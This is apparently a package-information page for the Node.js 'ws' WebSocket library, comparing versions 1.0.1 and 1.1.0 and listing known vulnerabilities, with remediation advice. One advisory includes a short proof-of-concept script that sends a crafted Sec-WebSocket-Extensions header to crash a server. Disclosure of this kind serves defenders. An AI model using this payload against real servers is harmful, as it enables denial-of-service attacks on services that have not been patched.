Ws version 1.1.0 represents an incremental update to the popular WebSocket library for Node.js, building upon the solid foundation of version 1.0.1. Both versions aim to provide developers with a simple, fast, and well-tested solution for implementing WebSocket clients, servers, and consoles, adhering to RFC-6455 standards. The core dependencies, including "ultron" for event handling and "options" for configuration, remain consistent, ensuring backward compatibility for many users. Similarly, the development dependencies used for testing and benchmarking, such as "mocha," "should," and "benchmark," are unchanged, suggesting a focus on maintaining existing performance and test coverage.
The critical difference lies in the release date, with version 1.1.0 released in April 2016, a few months after version 1.0.1 which was released in January 2016. This suggests that any changes would be focused on bug fixes, performance improvements, or minor feature enhancements, rather than a complete overhaul. Developers considering upgrading from 1.0.1 should prioritize reviewing the changelog and release notes for version 1.1.0 (available on the project's GitHub repository) to understand the specific alterations and determine if they address any known issues or provide desired improvements in their applications, taking into account specific use across client and server implementations of Websockets. Given the unchanged dependency specifications, many existing projects using version 1.0.1 will likely be able to upgrade to 1.1.0 without significant code modifications.
All the vulnerabilities related to the version 1.1.0 of the package
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.